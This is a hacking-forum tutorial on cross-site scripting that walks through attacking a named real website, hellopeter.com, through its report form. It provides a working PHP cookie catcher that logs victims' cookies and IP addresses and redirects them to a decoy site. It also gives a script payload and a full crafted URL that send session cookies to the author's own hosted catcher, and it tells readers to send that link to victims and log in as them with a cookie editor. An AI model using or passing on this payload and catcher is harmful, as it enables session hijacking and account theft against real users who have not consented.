XSS (Cross Site Scripting)

Hi guyz, this is Nishant Soni continuing the series of my articles for GeniusHackers Members. After a long time of preparation, here I am launching my another article which is all about “XSS”, which is also known as “Cross Site Scripting”. I’d prefer to call it “XSS”. This article has gone little more long since i have described everything in detail. If you read it with patience,  I am sure you’re going to learn many things out of it.

Little Background of XSS

XSS is basically using javascripts in different forms to get internet details of a user’s profile of respective website. With the help of XSS we can steal the cookies of the owner of the website.  XSS is a very large concept and your success rate depends on your imagination and experience. Like SQL Injection, keylogging are the certain things, where you follow certain steps to execute something. Where XSS is just understanding the way we can use java scripts, and the vulnerabilities of the website may be at the different places for executing your java scripts.  The very first thing that i would like you guys to understand is the difference between java and javascript.

So i could say that XSS or Cross site scripting means to take advantage of web applications that takes the user input but doesn’t filter them properly. This allows an attacker to inject HTML or other codes to get some hidden information out of it. Most common information that people look with XSS is Cookies. The cookies are used to maintain user authentication of respective website.

Java & JavaScripts

Java is an object oriented programming (OOP). This was created by James Gosling of Sun Microsystems. Javascript was created by the staff of Netscape. The main difference is that the JAVA is a self executable program which will work on its own on a windows based system. It is an independent program. While javascript is carefully drafted piece of code which is executed by all internet browsers. javascript is placed in the html code of a website, which further displayes relative information when the webpage is opened.

What is XSS?

Again, a little theory, XSS means to exploit some parts of a website to get the access to unprivileged parts of the website and change it to what you are not supposed to. As I said earlier, XSS totally depends on your imagination to find out a vulnerability in the website. But here are some most common vulnerabilities which may give you an opportunity. Just try to go through them and understand them

* Search terms :- Almost all of the websites have search boxes where you can try to search something from the website. In the search box you can type your malicious script and check the vulnerability.

* Text Boxes:- If you see any type of text boxes in the website which will basically let you put some query in it.

So overall, we are trying to find a place where we can write something, which will later be shown in the same webpage. So suppose, if you put “angelina” in the search box, then it should show you something like this on the next page “no search found for ANGELINA” or “10 search results found for ANGELINA”.  So the only idea is our search query should be echoed on the next page.

Types of XSS

There are 2 types of XSS vulnerability.

a. Persistent Cross Site Scripting
b. Non-persistent Cross site Scripting.

In this tutorial, i will explain “Persistent XSS” to you guyz. So you can understand how it works, and later on i will write another article about “Non-Persistent XSS”.

a. Persistent Cross Site Scripting:

Persistent Cross Site Scripting vulnerability would take place if the malicious code which you inject would be permanent on respective website. To understand it better. I will give u a little example.

Suppose if you found a forum which is vulnerable to XSS. Then you can make a “New Topic” or “New Thread” in the forum. Every time some user or the admin opens up that particular thread, your code would be executed which wouldn’t have been filtered due to lacks in the security of the website and user’s or admin’s  cookies would be sent to you on a “cookie catcher”, which would be a .php file stored on your own website. This website could be a free hosting website.

My Victim for this Tutorial

For this tutorial I am going to use “hellopeter.com”, which is a website where you can post your user experiences with different company’s customer service. So, without wasting anymore time lets just open up the website.

Hacking HelloPeter.Com (Click for a larger view)

Checking for Vulnerability

Now, the very first thing we will have to see is a place where we can input some text, and later on that should be displayed. If you look carefully, on the left hand side’s navigation, you will see a link to “Write a Report”, so there is a possibility that we might just get an opportunity in there. So lets open up that page.

Click for a larger view

Check out the picture i have posted above, in that picture you would see that i have written “<u>Nishant” as my name in the field. Basically what i m going to check with this is, if at the next page it shows “underline” with my name, that means that the webpage is not secured and it is parsing all the HTML information you put in it.  So lets click on Preview.

XSS (Cross Site Scripting)

As you might have already noticed, in the picture i posted above, as you guyz can see that the UNDERLINE has started right where my name has been placed. Which means that the website IS accepting the HTML input, and putting them into the preview page without making any necessary changes. This may lead us for an XSS attack on this website. Before, we actually jump to input our malicious code in it, lets have a look at the source of the web page so we know that where it SHOULD HAVE got filtered.

Open up the picture above this, you will see that the name that i wrote “<u>Nishant” look,s the same way, so it didn’t filter out the quotes. Lets see what happens if its a secured website.

For example of secure sites,
in GeniusHackers.com, at the right hand top you see a search bar, so in the search bar lets put “<u>blah” and hit enter. You will see that it will say “no search results found”. But you should notice here that it doesn’t say “No search results found for “<u>blah”. So it means that it is not ECHOING the word that we put into the search bar. So there is no chance to exlpoit the search bar of GeniusHackers.

Testing Java Scripts

Now lets continue with Hellopeter.com. Now, since we know that the website is vulnerable to XSS. We will try to run a small java script into the website. Since we know that we exploited the “Name field bar”. In the same bar we will put our script which should look as i have written below:

<script>alert(“TEST”)</script>

So what this will do is, it will popup a little alert box saying “Test” on it. And if it does that, it means that it accepts the javascripts input as well. So lets try it. Put the details as i have shown in the picture below.

Once, you’re done just clikc on the “Preview” button at the bottom. And in the next page you should get a popup that says “TEST”. Wow! Look at the picture below.

Example for finding Cookies.

Now, since we have seen that the website IS accepting javascript inputs and executing them on the next page, lets try to do something else with the javascripts. First of all, i want you guyz to understand what are cookies and where do you find them. Type the following command into the address bar of your web browser.

javascript:alert(document.cookie)

As soon as you type that command and hit enter on the keyboard, it should make some popup which will show you your cookies of respective website. Make sure you are logged in to check your cookies. As i said before, cookies are the things which handles the sessions information and logs you in every time you visit the website.
By doing this you can see your own cookies, but it would not help an attack UNLESS, we find some way to get those cookies sent to us. Now, lets go back to the “WRITE A REPORT” page and try following script into the “NAME” field.

Now, type as you see in the picture. And click on preview, then when it loads the next page,  you should see a pop-up coming up showing your own cookies to you. Now, lets try to find a way to get these cookies sent to us with the help of the java scripts.

Creating Cookie Catcher.

Cookie catcher is a file, which you will have to upload to some of your web hosting account, and change its permission to 777 so it can grab the cookies. Copy the following code and paste it to your notepad.

<?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location: http://www.TechMafias.com”);
?>

Just a little elaboration about the script. The first statement will get the cookies. Second statement will get the IP. Third statement will get the referer. The last link would send the victim to “TechMafias.com”. To make it a little less suspecious, you can change the link to hellopeter.com, so the victim wouldnt see anything unusual. so on. Copy the given code and put it into a notepad. Save it as something.php. Just make sure that you change the format to “.php”.

You’ll need a free webhosting account where you can upload the file. I personally use “t35.com”, so create an account there and upload this php file.  Make sure that you change its permissions to “777″.

Testing Cookie Catcher.

Now, as you guyz have seen that we have been executing a little script in that page which brings up an alert bar, lets go a little advanced. Lets try to send our own cookies to our cookie catcher. Try the following script in the “Name” field:

<script>document.location=”link-of-your-cookie-catcher?c=” + document.cookies</script>

Elaboration on the script.
Document.Location will change the location of the website and we have set it equals to the link of your cookies catcher and “?c=” we’ve added because its a get statement.  “+ document.cookies” means to visit your cookie catcher with the cookies of your victim’s site so it can record it.

Here is the first screenshot when i uploaded my “cookiecatcher.php” to my t35 hosting account.

Cookie Catcher (Click for a enlarged view)

Now, here is the second

Lets try if it works or not. I am going to using the script that I have shown in the “WRITE A REPORT” page of hellopeter.com I have posted the screenshot of it before.

Cookie Charset (Click for a enlarged view)

Now, If you click on Preview, it will take you to TechMafias.com OR whateva you have changed the link to in the Cookie Catcher. Now, lets login back to t35.com account, and you will notice another “cookies.html” file has been added, automatically. Look at the screenshot below.

Cookies HTML (Click for a enlarged view)

Now, if you open up the new automatically uploaded file, you will notice some cookies insde that file. It should look something as shows below.

Cookie: undefined
IP: MY IP
Date and Time: 21 April, 2009, 2:03 am
Referer: http://hellopeter.com/make_comment_preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.techmafias.t35.com%2Fcookiecatcher2.php%3Fc%3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whateva&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview

Note: This will look a little different from actual cookies, because when i stole these, i wasnt logged in, so if a user is logged in, then you should get a little different from this.

So, now, you can simply use my cookies in the “cookie editor” addon of mozilla firefox and login with whoever you want.

Stealing Actual Cookies

Till now, we were our own victim, we were trying to steal our own cookies to make sure this works. Now, lets try to get some actual victims. In this particular site, what happens is, you have to PREVIEW the post first and then submit it. So the javascript is getting executed whenever you preview it, so we can not submit it because the script is already executed. In other sites, you can directly submit the post, so the moment someone opens it, you will get the cookies. But for this particular site, we will have to do something else.

Whenever you put the script in the “NAME” and blah blah in other fields, you click on preview, QUICKLY, before it redirects you to the website as described in your cookie stealer, the URL will change to something else for a moment. Thats what you will have to copy. What i copied was this.

http://hellopeter.com/make_comment_preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.techmafias.t35.com%2Fcookiecatcher.php%3Fc%3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whateva&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview

And then , you just give this link to your victim, as soon as they click ON it, you get the cookies.

It is really useful because in other cases, you wouldn’t have to ask the victims to click on the link, you will actually submit the report. So as soon as someone reads it you get the cookies.

Conclusion

Since XSS is a very BIG topic, i might have missed something, you guyz are free to ask your questions to learn more. I believe XSS is the best way to exploit a website. While writing this tutorial i found a new XSS VULNERABILITY in GOOGLE!. With the help of that i can ACTUALLY HACK 1000s OF GOOGLE ID. I have posted a screenshot of the XSS that i have done to google below. Check it out.

Google Sucks(Click for a enlarged view)

I am not showing the script to you guyz because of the security reasons. I have already reported this issue to google and I am sure it would be fixed soon. Anyways, getting back, I hope this article taught you something. This is just a part of entire XSS magics, will write another soon.

Major XSS in Past

I added this section just to make you guyz realize that how dangerous XSS could be. There have been major hacking attempts on big networks in the past and some of them SUCCEEDED! Here are some example.

1. Orkut: Like 8 months ago, there was an XSS vulnerabilty found in “Orkut Albums”. Where you can inject your malicious javascript into the “Caption” of the photos. This vulnerability existed for about 10 days. The effect so massive that around 75,000+ accounts were hacked. It was fixed later on and some suspected “Hackers” accounts were suspended.

2. FaceBook: There was a same vulnerability exposure in FaceBook as orkut. Even in FaceBook, there was a vulnerability in ‘Albums’, where you can inject your scripts in the “Captions” of your photos. Around 45,000 IDs were hacked JUST in 2 days. FaceBook engineers were good enough to fix that in 2 days.

3. vBulletin: There was an XSS vulnerability in vBulletin version 3.6 and below, where an attacker can inject malicious code into any user’s profile as a “Visitors Message”. Many forums were hacked due to this.

Again, my name is Nishant.Soni, comments always appreciated. Another website that you can find me on is www.TechMafias.com

Have fun, Enjoy!